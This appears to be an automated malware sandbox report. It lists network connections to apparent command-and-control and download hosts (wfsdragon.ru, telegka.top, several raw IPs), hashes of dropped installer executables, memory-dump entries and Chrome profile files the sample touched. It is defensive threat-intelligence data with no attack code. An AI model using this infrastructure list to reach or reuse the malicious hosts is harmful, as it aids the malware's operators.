SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 216.58.204.74:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 s.lletlee.com udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
N/A 127.0.0.1:61901 tcp
N/A 127.0.0.1:61907 tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 d0fbd06f5709db11a8b2449a1b919251
SHA1 83f4610e15b613668b9ebad734dbc2f8fbefc614
SHA256 e94188908546b2f00a506d7596d3673b814ab62173967b3d258422877bc56f84
SHA512 c82970a78fba054ec6e9a962a43ca6fb94ddd3a0d744dd5b9d04a014f541e6da8038497c2ba15403df12600372cb624caf6e672eeac6915f680b062efeae1e8b

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe

MD5 c10ba859e90df8a8d8e7dcc8dfe5ac20
SHA1 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5
SHA256 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023
SHA512 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2212-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2212-75-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2212-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2212-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2212-87-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2212-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2212-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2212-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2212-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1840-88-0x0000000004F70000-0x0000000004FA6000-memory.dmp

memory/2212-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe

MD5 8b6f3a6e8d9797093a78f0b85da4a1fc
SHA1 2f8346a3ec3427c5a7681d166501f8f42f620b3b
SHA256 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8
SHA512 c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

memory/1840-114-0x0000000005EB0000-0x0000000005F16000-memory.dmp

memory/4956-133-0x00000000009B0000-0x0000000000A22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/4956-135-0x00000000050D0000-0x0000000005146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4880-148-0x0000000000890000-0x0000000000898000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-T4K51.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/4956-166-0x0000000005980000-0x0000000005F24000-memory.dmp

memory/4840-168-0x0000000000E90000-0x0000000000F00000-memory.dmp

memory/2480-167-0x00000000008C0000-0x0000000000930000-memory.dmp

memory/1584-173-0x0000000000400000-0x0000000000414000-memory.dmp

memory/404-178-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4944-182-0x0000000005E70000-0x0000000005EBC000-memory.dmp

memory/4944-177-0x0000000005D90000-0x0000000005DAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-EO89R.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4468-176-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1668-192-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2212-195-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2212-204-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2212-203-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2212-202-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2212-201-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2212-199-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4956-150-0x0000000005250000-0x000000000526E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

memory/3968-134-0x0000000002E70000-0x0000000002E76000-memory.dmp

memory/2012-217-0x0000000005850000-0x000000000595A000-memory.dmp

memory/2012-216-0x0000000005CC0000-0x00000000062D8000-memory.dmp

memory/2012-218-0x00000000057C0000-0x00000000057FC000-memory.dmp

memory/4816-215-0x00000000056C0000-0x00000000056D2000-memory.dmp

memory/1840-220-0x000000006DB10000-0x000000006DB5C000-memory.dmp

memory/1840-231-0x00000000076D0000-0x0000000007773000-memory.dmp

memory/4944-232-0x000000006DB10000-0x000000006DB5C000-memory.dmp

memory/4944-243-0x00000000077E0000-0x0000000007E5A000-memory.dmp

memory/1840-248-0x00000000078A0000-0x00000000078AA000-memory.dmp

memory/1840-249-0x0000000007A90000-0x0000000007B26000-memory.dmp

memory/4944-244-0x0000000006E80000-0x0000000006E9A000-memory.dmp

memory/4944-250-0x0000000007340000-0x0000000007351000-memory.dmp

memory/1840-230-0x0000000006AB0000-0x0000000006ACE000-memory.dmp

memory/1516-251-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/4944-256-0x0000000007380000-0x0000000007394000-memory.dmp

memory/4944-268-0x0000000007460000-0x0000000007468000-memory.dmp

memory/4944-267-0x0000000007470000-0x000000000748A000-memory.dmp

memory/4296-282-0x0000000003230000-0x0000000003420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TfSay.w

MD5 8649bd267357309e3ceaf325ef72ee1e
SHA1 7ea28d42e186163a536cdd276aafac6bf1ec9a2e
SHA256 98b9eb7f7bdab1e321d89320bbf37c6dd2f27a133c6886931a05dde265fbdfe1
SHA512 4bf603a2a08e241041910b6e812f3786f8ee5abeb4932f06aee7cf67ad39dba02937bb4b34a8d886ac6c98d419445ed06dd6c0df4dd6393f5ec0c70a30d3747b

C:\Users\Admin\AppData\Local\Temp\rqC~~.A

MD5 32ec5a7f8e578bbb6142b3c7972b5e3e
SHA1 dc335867f93b0e9e2f1d20ce520bb143789d733c
SHA256 7d828c11e69048323472ea71f6fd00bc26d6453ecb5f8972cf584d42a5748ec7
SHA512 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff

C:\Users\Admin\AppData\Local\Temp\F3U_R.J

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/4920-283-0x0000000000400000-0x0000000002F22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da16367083d29b4efb1510cec1bc787f
SHA1 59b6161c47cc8007610d8ada36e42e3bf4c6730c
SHA256 9d300d18285835f72f1df4c34dcefe6834b88627aa33bad03a5860e66a9dcb96
SHA512 4d8b6a4627d2ce0355ae8ae181162a1fdc9aaa120b613606abe0e511a0fac7d337b209b4ee69a33a63fc3b77d2e8dbe27e3175951a3156f9f56e42b3d60bff10

memory/1840-252-0x0000000007A50000-0x0000000007A5E000-memory.dmp

memory/1840-219-0x0000000006AD0000-0x0000000006B02000-memory.dmp

memory/2012-214-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19d1fc7d2654d7a.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4816-209-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4944-130-0x0000000005870000-0x0000000005BC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3968-123-0x0000000000D20000-0x0000000000D38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbidq42o.lrl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4536-284-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/1840-113-0x0000000005E40000-0x0000000005EA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/404-109-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1840-105-0x0000000005550000-0x0000000005572000-memory.dmp

memory/4296-285-0x00000000037D0000-0x0000000003875000-memory.dmp

memory/4944-89-0x0000000005160000-0x0000000005788000-memory.dmp

memory/4296-289-0x0000000003880000-0x0000000003912000-memory.dmp

memory/4296-286-0x0000000003880000-0x0000000003912000-memory.dmp

memory/1584-290-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2212-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2212-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2212-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2212-74-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2212-73-0x00000000007F0000-0x000000000087F000-memory.dmp

memory/2520-300-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2212-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4296-322-0x0000000003230000-0x0000000003420000-memory.dmp

memory/4920-321-0x0000000000400000-0x0000000002F22000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 80aaca2f3c92e76b0955b1994e870d2b
SHA1 ab262579f2f220dfa830f02ebccfbd6cde2b34ef
SHA256 14edecb3a5f24d3e1ceb9bc23c941201637746751191d46926121fbec53248aa
SHA512 e7178bfd7397c5ea7a273c5cad45e965a88f38b5d98dcb0fcd549b31553060a942d935e181027e9a3a58dde34674d140ddaeb82634aed37e18e90d0cc9d07cbf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 387159609c7681169f3caee879a7aed5
SHA1 c9edb92b0b5afd4dc4fc48271e8e52447b466451
SHA256 a1f1245f2548f1c170a842b889a87694aa68277e07a4302e66f4af64944c2eb8
SHA512 2077f634f9eec4f759445abc98c6454b1983b2b65c8d70a8f2d38c662f120662b7a480a5d5e37f40f05c527bbe5099adfd05d4c6b7d3117c858d6127edf33454

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0c878a22-07ff-4697-8321-8276b2144a05.tmp

MD5 8d2a482d36c06f53e4816feb13065a68
SHA1 5c7d3ff4ec82676313f61adda9fc45a6b42fef8e
SHA256 ac057ddfc1105dc56f515676a71033100308979b1a97546db359577df51780ee
SHA512 d701a9f3fdc42da5c2eca69e070ad8bac2a97d406f68b14e20118b67c3f676eace0070fd93e021054a528203214f5664fa3533dd3052693fa6b1831a728083b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9c44c2faeefda884c93043fcdaf32086
SHA1 18f714f743d9b9241254d689b3bda72e667efdcd
SHA256 ce04396fe1a2db49bcb24385729462b197c4a9f598faa2fb850d072575820d99
SHA512 4686d0626895514e1756fbe9751951551e25600e89ee08b9cc6d34f4d4533584b62e2d4d5d5d8399ec4e937e73ad6832e81aefeeb0e8b5aa0df46fbf056f2a3c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f2ec0f11ad71a19ff429683e8634bb42
SHA1 622784701f7526e5886bf79df3a4709d0cdaa7f2
SHA256 f8cee2fae12f3620eb73e277aaa886b89aee1d836bcd2ecec1c7434fc36ed414
SHA512 1cd0900d63923fafd034330d18503df66fd853eadaf8e22fe7f6c3ceb2d4d209ab808fa07a8888502a83cc2c6291514abf38d2505f9882aca8108c80fb419e09

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 0d54bacb2e4b4c893e2f17dac6895d00
SHA1 eefdd0e31464fe13b8303393d71261e69d8aa275
SHA256 5eeb2e1d5597cb2e6fd5d41109a804f04cec7f1bc8cb5fcced9ce230ed5ecbf3
SHA512 8cdc65d7b77269d75420d40954b733a832c94c957e1e625d3aefa2c752b71d151f4d891e3aa9602be475e01dbd3a72ab52623434078f2e4cbe756c2e6064d4a1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 799369fa87f824a5400cda941003a1f3
